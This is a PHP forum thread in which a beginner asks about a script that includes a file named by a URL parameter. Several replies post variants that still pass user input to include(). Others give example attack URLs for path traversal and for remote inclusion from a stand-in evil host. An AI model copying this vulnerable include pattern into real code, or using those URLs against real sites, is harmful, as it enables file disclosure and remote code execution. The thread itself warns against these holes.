A simple include script problem!

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

A simple include script problem!

Post by glav »

feyd | Please use

Code: Select all

,

Code: Select all

and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read:  [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]


OK - I have a small problem but it's bugging me out.

The little script I'm using is

Code: Select all

<?php      
if (@$a) {
    include "".$a.".inc";
} else {
    include "".main.".inc";
}
?>
First of all and I think I should ask these questions one at a time and get the answer for the fists one before asking the second.
Thats for my own benifit, so I don't get confused.

Question 1: In this script if the value for $a does not exist does the script then load main.php or does it only load main.php when the variable is not pass.

What I mean is this: http://www.sitename.com/index.php?a=nosuchfile

Does main.php load

OR

http://www.sitename.com/index.php

Only loads when the variable is not passed.

Or does it load for both cases.

Thanks


feyd | Please use

Code: Select all

,

Code: Select all

and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read:  [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

There's a thread linked from Useful Posts you need to read regarding this type of code.
User avatar
Zoxive
Forum Regular
Posts: 974
Joined: Fri Apr 01, 2005 4:37 pm
Location: Bay City, Michigan

Post by Zoxive »

Whats the the error suppression?

Code: Select all

if(!empty($_GET['a'])){
// $_GET['a'] Also Should be Filtered/Escaped/Checked
  include($_GET['a'] . '.inc'); // Edit: Forgot `.`
}else{
  include('main.inc');
}
Last edited by Zoxive on Sun Oct 07, 2007 3:50 pm, edited 2 times in total.
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

Zoxive, I tried that and got the error.

Warning: main(jetlagphp) [function.main]: failed to open stream:

the '.' is missing

so I put it in and tried to call a page that does not exist and I got this error

Warning: main(jetlag2.php) [function.main]: failed to open stream:

and yes the extension I use is .php not .inc

Thanks
User avatar
Zoxive
Forum Regular
Posts: 974
Joined: Fri Apr 01, 2005 4:37 pm
Location: Bay City, Michigan

Post by Zoxive »

glav wrote:Zoxive, I tried that and got the error.

Warning: main(jetlagphp) [function.main]: failed to open stream:

the '.' is missing

so I put it in and tried to call a page that does not exist and I got this error

Warning: main(jetlag2.php) [function.main]: failed to open stream:

and yes the extension I use is .php not .inc

Thanks
Well, you need to do more Checking.

Right now it is only seeing if the Variable $_GET['a'] exists, and then it tries and includes.

Code: Select all

$Ext = '.php';
// I would like to note again..
// $_GET['a'] Also Should be Filtered/Escaped/Checked
if(!empty($_GET['a']) && file_exists($_GET['a'] . $Ext){
  include($_GET['a'] . $Ext);
}else{
  include('main.inc');
}
If i go to your site, i could easily put sitename.com/index.php?a=../../anyfileiwant
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

Zoxive, first of all the '.' was not missing, it was my mistake.

When I try the new piece of code you wrote it only loads the main.php page even if the value for a exist.

Thanks for the help.
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

Have you read the thread I referred to in the first response?
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

feyd, i'm readin it at the moment.

Ok I’ve finished reading that, some snaky posts there, lots of fun.

Did it help, yes a little but I'll have to read a little more before I understand everything that was mentioned.


Thanks
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

OK Zoxive & feyd, I figured out why this was not working for me. I am using this on a new site that is based around a premade app that I wanted to use. When I tried your script Zoxive it did the same thing my own version did and when I tried on a site with out the premade app it worked fine. The reason was becasue I had to put the location in the file_exists function like this:

Code: Select all

$Ext = '.php'; 
// I would like to note again.. 
// $_GET['a'] Also Should be Filtered/Escaped/Checked 
if(!empty($_GET['a']) && file_exists("template/hhi/"$_GET['a'] . $Ext){ 
  include($_GET['a'] . $Ext); 
}else{ 
  include('main.inc'); 
}
This was because the index.php file was in wwwroot/or/ and the value's for $a where in wwwroot/or/template/hhi/

What I need to figure out is how to load the premade app into the wwwroot/ dir and load the $a values from there also.

Thanks for the help.
User avatar
Zoxive
Forum Regular
Posts: 974
Joined: Fri Apr 01, 2005 4:37 pm
Location: Bay City, Michigan

Post by Zoxive »

I have yet acquired the ability to read minds. And know exactly how your structure of your website is to give you exact code.

On a serious note, we are here to help you learn, give advice and point you in the right direction. So when you get code examples here (IF you do, i was feeling generous today) most of the time you still need to tweak them to your apps.
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

Even though I have read the thread feyd forwarded me to Im still a little confused about what steps I should use to secure the include method.

I need to make sure that the files are in a certain folders only and that a hacker can not enter in index.php?a=../../../somefile

Would this be enough or am i prone to an easy attack still.

Thanks
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Read that thread carefully. There are a lot of security topics covered in there, all of which you should use when allowing dynamic includes from user input.
mrkite
Forum Contributor
Posts: 104
Joined: Tue Sep 11, 2007 4:19 am

Post by mrkite »

even worse, make sure a hacker can't say index.php?a=http://myevilsite.com/blah.txt

because php will download blah.txt and execute the php code in it as if it were running locally.

I find it easiest to just do:

Code: Select all

$_GET['a']=preg_replace('|/|','',$_GET['a']);
Which should prevent people from passing paths or urls to your include statement.
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

The safest way would be to not allow users to tell your application which page to include directly.
User avatar
s.dot
Tranquility In Moderation
Posts: 5001
Joined: Sun Feb 06, 2005 7:18 pm
Location: Indiana

Post by s.dot »

A much more elegant solution would use file_exists() on the include file. An even more elegant solution wouldn't pass the filename via $_GET, but instead perhaps a number which indicates a specific file.
Set Search Time - A google chrome extension. When you search only results from the past year (or set time period) are displayed. Helps tremendously when using new technologies to avoid outdated results.
Post Reply